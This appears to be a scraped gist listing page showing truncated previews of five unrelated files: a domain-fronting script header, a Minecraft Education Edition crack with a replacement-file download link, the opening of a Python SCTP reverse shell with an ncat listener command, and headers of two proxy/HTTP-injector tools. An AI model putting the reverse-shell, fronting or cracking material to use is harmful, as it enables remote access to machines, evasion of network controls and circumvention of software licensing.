This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# How to do domain fronting in Python with Requests. | |
# | |
# Send a request to an arbitrary IP address and force the | |
# SNI field and Host HTTP header to a certain value. | |
# | |
import http.client | |
import requests | |
import urllib3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/// DEBUG SCREEN CRACK (RECOMMENDED) /// | |
1.7-1.20 (Win32-UWP-Android): | |
https://cdn.discordapp.com/attachments/1090766119326994502/1102104352530898975/debug_screen.json | |
Copy this file to: "Minecraft Education Edition/data/resource_packs/vanilla/ui" and replace it | |
/// PTR CRACK (Partially fixed since 1.18.42) /// | |
1.19.52.0 (Win32): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765 | |
# Connect with `ncat --sctp -lvp 1234` | |
import os, socket, subprocess | |
RHOST = '127.0.0.1' | |
RPORT = 1234 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
#!/usr/bin/python2 | |
#-*-coding:utf8-*- | |
#qpy:console | |
""" SimpleServer.py -h | |
Original Version By InunxLABS 1.00.10 - 22/07/13 | |
Mail : inunxlabs@gembox.us | |
Paypal : inunxelex@yahoo.com | |
Payza : inunxlabs@gmail.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
#!/usr/bin/python2 | |
#-*-coding:utf8-*- | |
# coding=utf-8 | |
#qpy:console | |
""" | |
HTTP Injector Python | |
https://stackoverflow.com/questions/43341946/injector-python-http-proxy-basic-proxy-authentication | |
+++ Inject Payload |